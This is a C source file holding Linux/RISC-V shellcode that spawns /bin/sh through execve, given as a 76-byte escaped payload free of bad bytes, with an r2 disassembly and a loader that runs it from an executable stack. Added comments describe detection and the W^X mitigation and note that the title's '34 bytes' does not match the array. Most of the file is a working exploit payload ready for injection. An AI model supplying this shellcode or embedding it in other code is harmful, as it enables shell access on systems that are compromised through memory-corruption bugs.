/*
Title:  Linux/RISC-V - execve("/bin/sh", NULL, 0) - 34 bytes
Date:   2019-06-06
Tested: riscv64 (qemu isa rv64imafdcu)
Author: Christina Quast - twitter: @binarychrysh

Inspired by: https://thomask.sdf.org/blog/2018/08/25/basic-shellcode-in-riscv-linux.html

RISC-V shellcode that avoids the bytes 0x20 (space), 0x0a (newline) and 0x00 (NUL)

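Compile (on a RISC-V host): gcc -z execstack -o loader loader.c
(-z execstack marks the stack executable; the loader runs the payload from a
stack buffer, so without it the jump into the buffer is expected to fault.)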

r2 output:
[0x000100b0]> pdf
            ;-- section..text:
            ;-- _start:
            ;-- rip:
/ (fcn) entry0 76
|   entry0 ();
|           0x000100b0      0111           addi sp, sp, -32            ; [01] -r-x section size 76 named .text
|           0x000100b2      06ec           sd ra, 24(sp)
|           0x000100b4      22e8           sd s0, 16(sp)
|           0x000100b6      13042102       addi s0, sp, 34
|           0x000100ba      b767696e       lui a5, 0x6e696
|           0x000100be      9387f722       addi a5, a5, 559
|           0x000100c2      2330f4fe       sd a5, -32(s0)
|           0x000100c6      b7776810       lui a5, 0x10687
|           0x000100ca      33480801       xor a6, a6, a6
|           0x000100ce      0508           addi a6, a6, 1
|           0x000100d0      7208           slli a6, a6, 0x1c
|           0x000100d2      b3870741       sub a5, a5, a6
|           0x000100d6      9387f732       addi a5, a5, 815
|           0x000100da      2332f4fe       sd a5, -28(s0)
|           0x000100de      930704fe       addi a5, s0, -32
|           0x000100e2      0146           li a2, 0
|           0x000100e4      8145           li a1, 0
|           0x000100e6      3e85           mv a0, a5
|           0x000100e8      9308d00d       li a7, 221
|           0x000100ec      93063007       li a3, 115
|           0x000100f0      230ed1ee       sb a3, -260(sp)
|           0x000100f4      9306e1ef       addi a3, sp, -258
\           0x000100f8      6780e6ff       jr -2(a3)


*/

#include <stdio.h>
#include <string.h>

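/*
 * Raw RISC-V machine code for the routine disassembled in the file header,
 * regrouped here one instruction per line (2-byte and 4-byte encodings are
 * mixed). The mnemonics are copied from that r2 listing.
 *
 * Size: 76 bytes, matching "entry0 76" in the listing; the "34 bytes" in the
 * title does not match this array. The array holds none of 0x00, 0x20 or
 * 0x0a, so strlen(SC) also yields 76.
 *
 * Points a reviewer or defender should take from the listing:
 *  - a7 is loaded with 221 and a1/a2 with 0, i.e. the execve("/bin/sh", NULL, 0)
 *    named in the title. An exec of a shell with an empty argument vector is
 *    unusual for legitimate software and is a reasonable thing to alert on.
 *  - The last four instructions store the byte 115 (0x73) below the stack
 *    pointer and then jump to that address, so the payload writes part of
 *    its own code at run time. It therefore needs memory that is writable
 *    and executable at once; a W^X / non-executable-stack policy stops it.
 *
 * Declared const because it points at a string literal, which must not be
 * modified.
 */
const char *SC =
    "\x01\x11"          /* addi sp, sp, -32  */
    "\x06\xec"          /* sd   ra, 24(sp)   */
    "\x22\xe8"          /* sd   s0, 16(sp)   */
    "\x13\x04\x21\x02"  /* addi s0, sp, 34   */
    "\xb7\x67\x69\x6e"  /* lui  a5, 0x6e696  */
    "\x93\x87\xf7\x22"  /* addi a5, a5, 559  */
    "\x23\x30\xf4\xfe"  /* sd   a5, -32(s0)  */
    "\xb7\x77\x68\x10"  /* lui  a5, 0x10687  */
    "\x33\x48\x08\x01"  /* xor  a6, a6, a6   */
    "\x05\x08"          /* addi a6, a6, 1    */
    "\x72\x08"          /* slli a6, a6, 0x1c */
    "\xb3\x87\x07\x41"  /* sub  a5, a5, a6   */
    "\x93\x87\xf7\x32"  /* addi a5, a5, 815  */
    "\x23\x32\xf4\xfe"  /* sd   a5, -28(s0)  */
    "\x93\x07\x04\xfe"  /* addi a5, s0, -32  */
    "\x01\x46"          /* li   a2, 0        */
    "\x81\x45"          /* li   a1, 0        */
    "\x3e\x85"          /* mv   a0, a5       */
    "\x93\x08\xd0\x0d"  /* li   a7, 221      */
    "\x93\x06\x30\x07"  /* li   a3, 115      */
    "\x23\x0e\xd1\xee"  /* sb   a3, -260(sp) */
    "\x93\x06\xe1\xef"  /* addi a3, sp, -258 */
    "\x67\x80\xe6\xff"; /* jr   -2(a3)       */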


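/*
 * Test harness for the byte string in SC.
 *
 * Copies the 76 payload bytes into a stack buffer, prints the payload length,
 * then calls the buffer as a function. If the payload behaves as the file
 * header describes, the process image is replaced and the call never returns.
 *
 * The call depends on the stack being mapped executable, which is why the
 * build line in the header passes `-z execstack`. With the toolchain's
 * default non-executable stack the jump into `payload` is expected to fault;
 * that fault is the mitigation working.
 *
 * Returns 0 only if control comes back from the payload.
 */
int main(void)
{
    char payload[76];

    /* SC contains no NUL bytes, so exactly sizeof payload bytes precede its
     * terminator; the terminator itself is deliberately not copied. */
    memcpy(payload, SC, sizeof payload);

    /* strlen() returns size_t: %zu is the matching conversion; the original
     * %d is undefined behaviour where size_t is wider than int (rv64). */
    fprintf(stdout, "Length: %zu\n", strlen(SC));

    /* A successful exec discards unflushed stdio buffers, so flush now or the
     * length line is lost whenever stdout is not a terminal. */
    fflush(stdout);

    /* Object-to-function pointer conversion is not defined by ISO C; it is
     * kept because treating the data buffer as code is the point of the test. */
    (*(void(*)()) payload) ();

    return 0;
}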